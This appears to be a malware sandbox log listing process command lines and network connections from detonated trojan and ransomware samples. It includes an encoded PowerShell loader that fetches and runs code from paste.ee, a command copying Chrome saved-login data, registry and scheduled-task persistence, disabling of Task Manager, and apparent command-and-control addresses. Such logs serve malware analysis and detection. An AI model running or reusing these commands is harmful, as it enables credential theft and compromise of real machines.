QB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBZAFQAaQBGAFIAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAQwAuAE0AXQA6ADoAUgAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA=
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AVwBhAHkAdQBXACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAF4AIgAsACAAIgA0ADQAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAKgAiACwAIAAiADQAOAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAjACIALAAgACIANwA4ACIAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBZAFQAaQBGAFIAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAQwAuAE0AXQA6ADoAUgAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA=
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\system32\taskmgr.exe" /0
C:\Windows\SysWOW64\taskmgr.exe
C:\Windows\system32\taskmgr.exe /0
C:\Windows\SysWOW64\cmd.exe
/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Program Files (x86)\M2d9\IconCache3frdbf.exe
"C:\Program Files (x86)\M2d9\IconCache3frdbf.exe"
C:\Program Files (x86)\M2d9\IconCache3frdbf.exe
"C:\Program Files (x86)\M2d9\IconCache3frdbf.exe"
C:\Windows\SysWOW64\NETSTAT.EXE
"C:\Windows\SysWOW64\NETSTAT.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-T~1.EXE"
C:\Users\Admin\Desktop\HEUR-T~1.EXE
C:\Users\Admin\Desktop\HEUR-T~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-T~4.EXE"
C:\Users\Admin\Desktop\HEUR-T~4.EXE
C:\Users\Admin\Desktop\HEUR-T~4.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HE4190~1.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HE058A~1.EXE"
C:\Users\Admin\Desktop\HE058A~1.EXE
C:\Users\Admin\Desktop\HE058A~1.EXE
C:\Users\Admin\Desktop\he058a~1.exe
C:\Users\Admin\Desktop\he058a~1.exe {5E4B6968-A162-4EC0-88EF-44CC6FF96D9B}
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\BACKDO~2.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEB5AA~1.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oAdQfQEfcUI" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9588.tmp"
C:\Windows\SysWOW64\schtasks.exe
C:\Windows\System32\schtasks.exe /Create /TN Updates\oAdQfQEfcUI /XML C:\Users\Admin\AppData\Local\Temp\tmp9588.tmp
C:\Users\Admin\Desktop\HEUR-T~1.EXE
"{path}"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-E~3.EXE"
C:\Users\Admin\Desktop\HEUR-T~4.EXE
"{path}"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-T~4.EXE"
C:\Users\Admin\Desktop\HEUR-T~4.EXE
C:\Users\Admin\Desktop\HEUR-T~4.EXE
C:\Windows\SysWOW64\PortableDeviceSyncProvider\d3dramp.exe
"C:\Windows\SysWOW64\PortableDeviceSyncProvider\d3dramp.exe"
C:\Windows\SysWOW64\REG.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System / v DisableTaskMgr / t REG_DWORD / d 1 / f
C:\Windows\SysWOW64\whoami.exe
whoami /all
C:\Windows\SysWOW64\cmd.exe
cmd /c set
C:\Windows\SysWOW64\arp.exe
arp -a
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /all
C:\Windows\SysWOW64\net.exe
net view /all
C:\Windows\SysWOW64\nslookup.exe
nslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.WORKGROUP
C:\Windows\SysWOW64\net.exe
net share
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share
C:\Windows\SysWOW64\route.exe
route print
C:\Windows\SysWOW64\netstat.exe
netstat -nao
C:\Windows\SysWOW64\net.exe
net localgroup
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\Desktop\HEUR-Trojan-Ransom.Win32.Blocker.vho-11123fd370dfdb5d9d5cade853fa923679377c7791bda00d2f415078e2729e65.exe
"C:\Users\Admin\Desktop\HEUR-Trojan-Ransom.Win32.Blocker.vho-11123fd370dfdb5d9d5cade853fa923679377c7791bda00d2f415078e2729e65.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-T~1.EXE"
C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-T~1.EXE
C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-T~1.EXE
C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-T~1.EXE
C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-T~1.EXE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upgrade /t REG_SZ /d "C:\Users\Admin\AppData\Local\main.exe""
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upgrade /t REG_SZ /d "C:\Users\Admin\AppData\Local\main.exe"
C:\Users\Admin\Desktop\HEUR-Exploit.Win32.ShellCode.vho-138c60f8df9c59cf59cbdfbf5004ceda539b0de2cd70207b79833805594a9746.exe
"C:\Users\Admin\Desktop\HEUR-Exploit.Win32.ShellCode.vho-138c60f8df9c59cf59cbdfbf5004ceda539b0de2cd70207b79833805594a9746.exe"
C:\Users\Admin\Desktop\HEUR-Trojan.Win32.Mansabo.vho-0bf5d57855e051e01e4547e1cb67aa4825618cbbeffefcf433d64e21881002de.exe
"C:\Users\Admin\Desktop\HEUR-Trojan.Win32.Mansabo.vho-0bf5d57855e051e01e4547e1cb67aa4825618cbbeffefcf433d64e21881002de.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-E~1.EXE"
C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-E~1.EXE
C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-E~1.EXE
C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\system32\ipconfig.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4020 -ip 4020
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\system32\taskmgr.exe" /0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 684
C:\Windows\SysWOW64\taskmgr.exe
C:\Windows\system32\taskmgr.exe /0
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:49731 | tcp | |
| US | 8.8.8.8:53 | samples.vx-underground.org | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | tcp |
| US | 104.18.6.192:443 | samples.vx-underground.org | tcp |
| US | 104.18.6.192:443 | samples.vx-underground.org | tcp |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| N/A | 127.0.0.1:49739 | tcp | |
| US | 35.190.72.216:443 | location.services.mozilla.com | tcp |
| GB | 88.221.134.209:80 | a19.dscg10.akamai.net | tcp |
| GB | 88.221.134.209:80 | a19.dscg10.akamai.net | tcp |
| US | 35.190.72.216:443 | location.services.mozilla.com | udp |
| GB | 172.217.169.46:443 | redirector.gvt1.com | tcp |
| GB | 172.217.169.46:443 | redirector.gvt1.com | udp |
| NL | 172.217.132.233:443 | r4.sn-5hne6n6e.gvt1.com | tcp |
| NL | 172.217.132.233:443 | r4.sn-5hne6n6e.gvt1.com | tcp |
| NL | 172.217.132.233:443 | r4.sn-5hne6n6e.gvt1.com | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| GB | 172.217.169.46:443 | redirector.gvt1.com | tcp |
| NL | 172.217.132.199:443 | r2---sn-5hnednss.gvt1.com | tcp |
| NL | 172.217.132.199:443 | r2---sn-5hnednss.gvt1.com | udp |
| GB | 142.250.187.228:443 | www.google.com | tcp |
| GB | 142.250.187.228:443 | www.google.com | udp |
| RU | 176.96.238.128:443 | tcp | |
| RU | 176.96.238.128:443 | tcp | |
| NL | 185.117.73.222:3344 | tcp | |
| US | 199.232.192.193:443 | i.imgur.com | tcp |
| RU | 176.96.238.128:443 | tcp | |
| DE | 172.217.16.195:443 | beacons.gcp.gvt2.com | tcp |
| RU | 176.96.238.128:443 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 172.217.16.238:443 | clients2.google.com | tcp |
| GB | 142.250.200.1:443 | clients2.googleusercontent.com | tcp |
| RU | 176.96.238.128:443 | tcp | |
| RU | 176.96.238.128:443 | tcp | |
| RU | 176.96.238.128:443 | tcp | |
| RU | 176.96.238.128:443 | tcp | |
| US | 107.185.211.16:80 | tcp | |
| DE | 172.217.16.195:443 | beacons.gcp.gvt2.com | udp |
| US | 96.8.113.4:8080 | tcp | |
| RU | 176.96.238.128:443 | tcp | |
| JP | 153.126.210.205:7080 | tcp | |
| US | 71.197.211.156:80 | tcp | |
| US | 104.21.84.67:443 | paste.ee | tcp |
| RU | 176.96.238.128:443 | tcp | |
| US | 47.146.117.214:80 | tcp | |
| DE | 87.118.70.45:8080 | tcp | |
| US | 8.8.8.8:53 | www.szbiqiangli.com | udp |
| HK | 45.207.100.147:80 | www.szbiqiangli.com | tcp |
| US | 8.8.8.8:53 | 147.100.207.45.in-addr.arpa | udp |
| US | 104.131.44.150:8080 | tcp | |
| FR | 91.121.54.71:8080 | 91.121.54.71 | tcp |
| KR | 116.125.120.88:443 | tcp | |
| ES | 213.60.96.117:80 | tcp | |
| RU | 176.96.238.128:443 | tcp | |
| ZA | 169.239.182.217:8080 | tcp | |
| GB | 95.179.229.244:8080 | tcp | |
| RS | 188.2.217.94:80 | tcp | |
| US | 209.182.216.177:443 | tcp | |
| RU | 176.96.238.128:443 | tcp | |
| US | 174.100.27.229:80 | tcp | |
| US | 209.141.54.221:8080 | tcp | |
| CZ | 46.28.111.142:7080 | tcp | |
| CL | 186.103.141.250:443 | tcp | |
| RU | 176.96.238.128:443 | tcp | |
| FR | 5.196.74.210:8080 | tcp | |
| US | 195.123.241.68:443 | tcp | |
| GB | 142.250.187.206:443 | google.com | tcp |
| US | 195.123.241.68:443 | tcp | |
| US | 207.144.103.227:80 | tcp | |
| US | 195.123.241.68:443 | tcp | |
| US | 195.123.241.175:443 | tcp | |
| US | 72.12.127.184:443 | tcp | |
| US | 3.33.130.190:80 | www.lizoschwald.com | tcp |
| US | 3.33.130.190:80 | www.lizoschwald.com | tcp |
| RU | 176.96.238.128:443 | tcp | |
| AU | 110.142.219.51:80 | tcp | |
| US | 195.123.241.175:443 | tcp | |
| US | 104.131.11.150:443 | tcp | |
| US | 34.66.135.39:80 | www.homedecorhandicrafts.com | tcp |
| US | 8.8.8.8:53 | 39.135.66.34.in-addr.arpa | udp |
| US | 34.66.135.39:80 | www.homedecorhandicrafts.com | tcp |
| US | 98.13.75.196:80 | tcp | |
| US | 70.32.84.74:8080 | tcp | |
| US | 195.123.241.175:443 | tcp | |
| AR | 200.55.243.138:8080 | tcp | |
| RU | 176.96.238.128:443 | tcp | |
| RU | 85.143.221.85:443 | tcp | |
| FR | 91.121.54.71:8080 | 91.121.54.71 | tcp |
| RU | 82.146.37.128:443 | tcp | |
| US | 70.32.115.157:8080 | tcp | |
| US | 209.236.123.42:8080 | tcp | |
| US | 8.8.8.8:53 | www.allsortofgirls.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | _ldap._tcp.dc._msdcs.WORKGROUP | udp |
| US | 8.8.8.8:53 | _ldap._tcp.dc._msdcs.WORKGROUP | udp |
| DE | 116.203.32.252:8080 | tcp | |
| SE | 192.229.221.95:80 | evcs-crl.ws.symantec.com | tcp |
| US | 8.8.8.8:53 | evcs-ocsp.ws.symantec.com | udp |
| DE | 152.199.19.74:80 | evcs-ocsp.ws.symantec.com | tcp |
| SE | 192.229.221.95:80 | evcs-crl.ws.symantec.com | tcp |
| UA | 77.52.245.101:8008 | tcp | |
| RU | 82.146.37.128:443 | tcp | |
| US | 207.246.71.122:443 | tcp | |
| AU | 111.67.12.221:8080 | tcp | |
| US | 207.246.71.122:443 | tcp | |
| GB | 89.32.150.160:8080 | tcp | |
| US | 142.105.151.124:443 | tcp | |
| RU | 176.96.238.128:443 | tcp | |
| US | 207.246.71.122:443 | tcp | |
| UA | 77.52.245.101:8008 | tcp | |
| RU | 82.146.37.128:443 | tcp | |
| US | 207.246.71.122:443 | tcp | |
| MY | 219.92.13.25:80 | tcp | |
| US | 199.232.192.193:443 | i.imgur.com | tcp |
| GB | 212.71.237.140:8080 | tcp | |
| RO | 188.247.252.243:443 | tcp | |
| CZ | 81.2.235.111:8080 | tcp | |
| UA | 77.52.245.101:8008 | tcp | |
| UZ | 45.138.158.41:443 | tcp | |
| RO | 188.247.252.243:443 | tcp | |
| RO | 188.247.252.243:443 | tcp | |
| ES | 149.62.173.247:8080 | tcp | |
| RU | 176.96.238.128:443 | tcp | |
| FR | 51.255.165.160:8080 | tcp | |
| RO | 188.247.252.243:443 | tcp | |
| UA | 77.52.245.101:8008 | tcp | |
| CA | 74.120.55.163:80 | tcp | |
| UZ | 45.138.158.41:443 | tcp | |
| GB | 213.120.109.73:2222 | tcp | |
| GB | 213.120.109.73:2222 | tcp | |
| BR | 177.72.13.80:80 | tcp | |
| UA | 77.52.245.101:8008 | tcp | |
| OM | 188.135.15.49:80 | tcp | |
| UZ | 45.138.158.41:443 | tcp | |
| GB | 213.120.109.73:2222 | tcp | |
| DE | 167.86.90.214:8080 | tcp | |
| GB | 213.120.109.73:2222 | tcp | |
| RU | 176.96.238.128:443 | tcp | |
| UA | 77.52.245.101:8008 | tcp | |
| BA | 77.238.212.227:80 | tcp | |
| GB | 37.220.6.126:443 | tcp | |
| US | 97.93.211.17:443 | tcp | |
| BR | 189.2.177.210:443 | tcp | |
| HK | 45.207.100.147:80 | www.szbiqiangli.com | tcp |
| DE | 87.106.139.101:8080 | tcp | |
| US | 97.93.211.17:443 | tcp | |
| BE | 74.125.206.16:465 | smtp.googlemail.com | tcp |
| US | 97.93.211.17:443 | tcp | |
| UA | 77.52.245.101:8008 | tcp | |
| GB | 37.220.6.126:443 | tcp | |
| FR | 5.196.35.138:7080 | tcp | |
| US | 97.93.211.17:443 | tcp | |
| BR | 45.161.242.102:80 | tcp | |
| NL | 37.139.21.175:8080 | tcp | |
| RU | 176.96.238.128:443 | tcp | |
| ES | 185.19.190.81:443 | tcp | |
| UA | 77.52.245.101:8008 | tcp | |
| GB | 37.220.6.126:443 | tcp | |
| BE | 74.125.206.16:465 | smtp.googlemail.com | tcp |
| ES | 185.19.190.81:443 | tcp | |
| TH | 114.109.179.60:80 | tcp | |
| US | 72.167.223.217:8080 | tcp | |
| ES | 185.19.190.81:443 | tcp | |
| MX | 189.212.199.126:443 | tcp | |
| ES | 185.19.190.81:443 | tcp | |
| UA | 77.52.245.101:8008 | tcp | |
| FR | 51.254.25.115:53 | zirabuo.bazar | udp |
| IT | 193.183.98.66:53 | zirabuo.bazar | udp |
| RU | 91.217.137.37:53 | zirabuo.bazar | udp |
| US | 8.8.8.8:53 | www.iskovlay.com | udp |
| FR | 87.98.175.85:53 | zirabuo.bazar | udp |
| AT | 185.121.177.177:53 | zirabuo.bazar | udp |
| US | 8.8.8.8:53 | 37.137.217.91.in-addr.arpa | udp |
| ZA | 169.239.202.202:53 | zirabuo.bazar | udp |
| US | 198.251.90.143:53 | zirabuo.bazar | udp |
| US | 8.8.8.8:53 | 177.177.121.185.in-addr.arpa | udp |
| AT | 5.132.191.104:53 | zirabuo.bazar | udp |
| AU | 111.67.20.8:53 | zirabuo.bazar | udp |
| US | 8.8.8.8:53 | 104.191.132.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.90.251.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.20.67.111.in-addr.arpa | udp |
| AU | 163.53.248.170:53 | zirabuo.bazar | udp |
| CA | 142.4.204.111:53 | zirabuo.bazar | udp |
| CA | 142.4.205.47:53 | zirabuo.bazar | udp |
| US | 8.8.8.8:53 | mecharnise.ir | udp |
| US | 8.8.8.8:53 | 170.248.53.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.204.4.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.205.4.142.in-addr.arpa | udp |
| CA | 158.69.239.167:53 | zirabuo.bazar | udp |
| CA | 104.37.195.178:53 | zirabuo.bazar | udp |
| US | 8.8.8.8:53 | 167.239.69.158.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.195.37.104.in-addr.arpa | udp |
| CO | 181.129.96.162:8080 | tcp | |
| CA | 192.99.85.244:53 | zirabuo.bazar | udp |
| CA | 158.69.160.164:53 | zirabuo.bazar | udp |
| US | 8.8.8.8:53 | 164.160.69.158.in-addr.arpa | udp |
| CH | 46.28.207.199:53 | zirabuo.bazar | udp |
| CH | 31.171.251.118:53 | zirabuo.bazar | udp |
| CZ | 81.2.241.148:53 | zirabuo.bazar | udp |
| FR | 51.254.25.115:53 | zirabuo.bazar | udp |
| DE | 82.141.39.32:53 | zirabuo.bazar | udp |
| US | 8.8.8.8:53 | 32.39.141.82.in-addr.arpa | udp |
| DE | 50.3.82.215:53 | zirabuo.bazar | udp |
| DE | 46.101.70.183:53 | zirabuo.bazar | udp |
| DE | 5.45.97.127:53 | zirabuo.bazar | udp |
| DE | 130.255.78.223:53 | zirabuo.bazar | udp |
| DE | 144.76.133.38:53 | zirabuo.bazar | udp |
| US | 8.8.8.8:53 | 223.78.255.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.133.76.144.in-addr.arpa | udp |
| DE | 139.59.208.246:53 | zirabuo.bazar | udp |
| DE | 172.104.136.243:53 | zirabuo.bazar | udp |
| BE | 74.125.206.16:465 | smtp.googlemail.com | tcp |
| US | 8.8.8.8:53 | 246.208.59.139.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.136.104.172.in-addr.arpa | udp |
| EC | 45.71.112.70:53 | zirabuo.bazar | udp |
| BA | 77.238.212.227:80 | tcp | |
| FR | 163.172.185.51:53 | zirabuo.bazar | udp |
| FR | 87.98.175.85:53 | zirabuo.bazar | udp |
| FR | 5.135.183.146:53 | zirabuo.bazar | udp |
| RU | 176.96.238.128:443 | tcp | |
| FR | 51.255.48.78:53 | zirabuo.bazar | udp |
| FR | 188.165.200.156:53 | zirabuo.bazar | udp |
| FR | 147.135.185.78:53 | zirabuo.bazar | udp |
| FR | 92.222.97.145:53 | zirabuo.bazar | udp |
| TH | 103.86.49.11:8080 | tcp | |
| FR | 51.255.211.146:53 | zirabuo.bazar | udp |
| US | 8.8.8.8:53 | 78.185.135.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.211.255.51.in-addr.arpa | udp |
| GB | 159.89.249.249:53 | zirabuo.bazar | udp |
| ES | 84.78.128.76:2222 | tcp | |
| GB | 104.238.186.189:53 | zirabuo.bazar | udp |
| IN | 139.59.23.241:53 | zirabuo.bazar | udp |
| IT | 193.183.98.66:53 | zirabuo.bazar | udp |
| IT | 94.177.171.127:53 | zirabuo.bazar | udp |
| JP | 45.63.124.65:53 | zirabuo.bazar | udp |
| LT | 212.24.98.54:53 | zirabuo.bazar | udp |
| UA | 77.52.245.101:8008 | tcp | |
| MD | 178.17.170.179:53 | zirabuo.bazar | udp |
| NL | 185.208.208.141:53 | zirabuo.bazar | udp |
| NL | 82.196.9.45:53 | zirabuo.bazar | udp |
| NL | 146.185.176.36:53 | zirabuo.bazar | udp |
| US | 8.8.8.8:53 | 36.176.185.146.in-addr.arpa | udp |
| SE | 89.35.39.64:53 | zirabuo.bazar | udp |
| RO | 89.18.27.167:53 | zirabuo.bazar | udp |
| RU | 77.73.68.161:53 | zirabuo.bazar | udp |
| RU | 91.217.137.37:53 | zirabuo.bazar | udp |
| RU | 185.117.154.144:53 | zirabuo.bazar | udp |
| SE | 176.126.70.119:53 | zirabuo.bazar | udp |
| SG | 139.99.96.146:53 | zirabuo.bazar | udp |
| UA | 217.12.210.54:53 | zirabuo.bazar | udp |
| GB | 185.164.136.225:53 | zirabuo.bazar | udp |
| US | 192.52.166.110:53 | zirabuo.bazar | udp |
| US | 63.231.92.27:53 | zirabuo.bazar | udp |
| CA | 66.70.211.246:53 | zirabuo.bazar | udp |
| US | 96.47.228.108:53 | zirabuo.bazar | udp |
| US | 45.32.160.206:53 | zirabuo.bazar | udp |
| US | 128.52.130.209:53 | zirabuo.bazar | udp |
| US | 35.196.105.24:53 | zirabuo.bazar | udp |
| US | 172.98.193.42:53 | zirabuo.bazar | udp |
| US | 162.248.241.94:53 | zirabuo.bazar | udp |
| US | 107.172.42.186:53 | zirabuo.bazar | udp |
| US | 167.99.153.82:53 | zirabuo.bazar | udp |
| US | 138.197.25.214:53 | zirabuo.bazar | udp |
| US | 69.164.196.21:53 | zirabuo.bazar | udp |
| FR | 51.254.25.115:53 | aecfijafefip.bazaar | udp |
| IT | 193.183.98.66:53 | aecfijafefip.bazaar | udp |
| US | 8.8.8.8:53 | 54.210.12.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.136.164.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.166.52.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.92.231.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.211.70.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.228.47.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.160.32.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.130.52.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.105.196.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.193.98.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.241.248.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.42.172.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.153.99.167.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.25.197.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.196.164.69.in-addr.arpa | udp |
| RU | 91.217.137.37:53 | aecfijafefip.bazaar | udp |
| FR | 87.98.175.85:53 | aecfijafefip.bazaar | udp |
| AT | 185.121.177.177:53 | aecfijafefip.bazaar | udp |
| ES | 84.78.128.76:2222 | tcp | |
| ZA | 169.239.202.202:53 | aecfijafefip.bazaar | udp |
| US | 198.251.90.143:53 | aecfijafefip.bazaar | udp |
| AT | 5.132.191.104:53 | aecfijafefip.bazaar | udp |
| AU | 111.67.20.8:53 | aecfijafefip.bazaar | udp |
| AU | 163.53.248.170:53 | aecfijafefip.bazaar | udp |
| CA | 142.4.204.111:53 | aecfijafefip.bazaar | udp |
| CA | 142.4.205.47:53 | aecfijafefip.bazaar | udp |
| CA | 158.69.239.167:53 | aecfijafefip.bazaar | udp |
| CA | 104.37.195.178:53 | aecfijafefip.bazaar | udp |
| CA | 192.99.85.244:53 | aecfijafefip.bazaar | udp |
| CA | 158.69.160.164:53 | aecfijafefip.bazaar | udp |
| CH | 46.28.207.199:53 | aecfijafefip.bazaar | udp |
| CH | 31.171.251.118:53 | aecfijafefip.bazaar | udp |
| CZ | 81.2.241.148:53 | aecfijafefip.bazaar | udp |
| FR | 51.254.25.115:53 | aecfijafefip.bazaar | udp |
| DE | 82.141.39.32:53 | aecfijafefip.bazaar | udp |
| DE | 50.3.82.215:53 | aecfijafefip.bazaar | udp |
| DE | 46.101.70.183:53 | aecfijafefip.bazaar | udp |
| DE | 5.45.97.127:53 | aecfijafefip.bazaar | udp |
| DE | 130.255.78.223:53 | aecfijafefip.bazaar | udp |
| DE | 144.76.133.38:53 | aecfijafefip.bazaar | udp |
| DE | 139.59.208.246:53 | aecfijafefip.bazaar | udp |
| DE | 172.104.136.243:53 | aecfijafefip.bazaar | udp |
| EC | 45.71.112.70:53 | aecfijafefip.bazaar | udp |
| FR | 163.172.185.51:53 | aecfijafefip.bazaar | udp |
| FR | 87.98.175.85:53 | aecfijafefip.bazaar | udp |
| FR | 5.135.183.146:53 | aecfijafefip.bazaar | udp |
| FR | 51.255.48.78:53 | aecfijafefip.bazaar | udp |
| FR | 188.165.200.156:53 | aecfijafefip.bazaar | udp |
| FR | 147.135.185.78:53 | aecfijafefip.bazaar | udp |
| FR | 92.222.97.145:53 | aecfijafefip.bazaar | udp |
